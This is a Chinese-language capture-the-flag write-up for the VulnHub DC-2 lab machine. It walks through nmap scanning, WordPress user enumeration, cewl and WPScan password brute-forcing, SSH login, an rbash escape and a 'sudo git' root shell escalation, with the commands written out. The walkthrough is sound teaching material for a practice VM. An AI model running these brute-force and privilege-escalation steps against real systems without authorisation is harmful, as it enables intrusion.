vulnhub DC-2靶机实战
字数 1280 2025-08-12 11:34:39
DC-2 靶机渗透测试实战教程
0X00 靶机概述
DC-2 是 Vulnhub 上的一个渗透测试靶机,基于 WordPress 构建,包含多个 flag 和提权路径。本教程将详细记录从信息收集到最终提权的完整过程。
0X01 环境准备
-
下载靶机:
- 下载地址:https://www.vulnhub.com/entry/dc-2,311/
- 下载后解压并用 VMware 或 VirtualBox 打开
-
网络配置:
- 建议使用 NAT 模式(避免桥接模式导致的 IP 混淆)
- 确认攻击机和靶机在同一网段
0X02 信息收集
1. IP 地址发现
使用 nmap 扫描本地网络:
nmap -sP 192.168.23.0/24
发现靶机 IP 为 192.168.23.173
2. 端口扫描与服务识别
全面扫描靶机开放端口和服务:
nmap --script=vuln 192.168.23.173
初步发现:
- 80 端口开放 HTTP 服务
- 疑似 WordPress 系统
3. Web 服务分析
访问 http://192.168.23.173 发现重定向到 dc-2
解决方法:
修改本地 hosts 文件:
192.168.23.173 dc-2
访问后确认是 WordPress 站点,并发现 flag1:
提示:需要登录才能看到下一个 flag
0X03 用户枚举与密码爆破
1. 用户枚举
通过 WordPress 特性发现三个用户:
- admin
- tom
- jerry
2. 密码字典生成
使用 cewl 生成基于网站内容的字典:
cewl http://dc-2 -w dict.txt
3. WPScan 爆破
使用 WPScan 进行密码爆破:
wpscan --url http://dc-2 -P dict.txt -U users.txt
爆破结果:
- jerry: adipiscing
- tom: parturient
0X04 获取 Flag
1. Flag2
使用 jerry 登录 WordPress 后台,发现 flag2:
提示:这条路径无法继续,尝试其他方法
2. 全端口扫描
nmap -A -p 1-65535 192.168.23.173
发现 SSH 服务运行在 7744 端口
3. SSH 登录
尝试用 tom 用户登录:
ssh tom@192.168.23.173 -p 7744
密码:parturient
登录后发现 flag3:
提示:tom 和 jerry 用户,以及 su 命令
4. Flag4
发现受限制的 shell (rbash),绕过方法:
ssh tom@192.168.23.173 -p 7744 -t "/bin/sh"
切换到 jerry 用户:
su jerry
密码:adipiscing
在 jerry 目录下找到 flag4:
提示:git 提权
0X05 提权
1. 检查 sudo 权限
sudo -l
发现 jerry 可以以 root 权限运行 git
2. Git 提权
sudo git help config
在帮助界面底部输入:
!/bin/bash
获得 root shell
3. 获取最终 Flag
cd /root
cat final-flag.txt
0X06 总结
完整渗透路径:
- nmap 扫描发现 80 端口 WordPress
- 解决重定向问题获取 flag1
- WPScan 爆破获取用户凭据
- WordPress 后台获取 flag2
- 全端口扫描发现 7744 SSH
- SSH 登录获取 flag3
- 用户切换获取 flag4
- Git 提权获取 root 权限和最终 flag
关键点:
- 主机名重定向问题
- WPScan 密码爆破
- 非标准 SSH 端口
- rbash 绕过
- git sudo 提权